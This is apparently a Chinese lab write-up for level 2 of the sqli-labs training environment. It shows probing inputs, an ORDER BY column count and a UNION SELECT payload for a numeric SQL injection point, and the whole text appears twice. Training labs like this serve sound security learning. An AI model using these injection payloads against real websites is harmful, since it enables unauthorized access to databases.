sqli_labs_master(LESS-2)
LESS-2
和第一关步骤一样,先判断
输入
/?id=1
/?id=2
/?id=1'
输入1,2正常回显但加个单引号报错,说明是数字型,先用order by 判断栏目数量(这里省略),然后再爆显示位
/?id=1 order by xxx
/?id=-1 union select 1,2,3
开始搞事!!!!!!!!!
和第一关步骤一样,先判断
输入
/?id=1
/?id=2
/?id=1'
输入1,2正常回显但加个单引号报错,说明是数字型,先用order by 判断栏目数量(这里省略),然后再爆显示位
/?id=1 order by xxx
/?id=-1 union select 1,2,3
开始搞事!!!!!!!!!
浙公网安备 33010602011771号